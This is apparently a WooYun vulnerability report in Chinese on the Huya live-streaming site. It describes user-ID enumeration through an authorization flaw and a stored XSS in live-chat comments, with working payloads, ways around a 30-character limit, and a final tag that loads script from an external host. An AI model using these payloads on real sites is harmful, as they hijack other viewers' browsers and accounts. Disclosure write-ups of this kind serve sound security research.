WooYun.org

问题是虎牙直播。
首先是越权，遍历一遍用户ID。
嗯，订阅数就是各大主播蒙昧以求的了。
然后，视频直播时时留言处有xss，不仅仅是自己x自己。
我注册两个号，然后一个号发送留言，另一个号也会成功被x。
首先弹窗,<img src=# onerror=alert(1)>。
这里他限制了30个字符，虽然我也定位到了js函数，也改了，但还是会有限制长度，不知道为什么，可能是服务器做了限制。而且浏览器上的burp抓包是无法抓取到post的数据包的。
所以暂时我只能想办法缩短payload长度。
<img src=# onerror=http://s.xxx.cn>
<img onerror=http://s.xxx.cn src=>
<img onerror=http://s.xxx.cn src>
尝试使用script标签。没有被过滤，但是长度不够。
这里想到了xsser当初提出的多行xss的方式，既：
第一次输入:<sciprt>/*或者<!--
第二次输入：*/alert(1)</script>或者-->
尝试不行。
这里大晚上的没看清后面其实自动闭合了</script>，后来看到了。
那这样就<script src=http://123123123>就可以了，后面会自动闭合。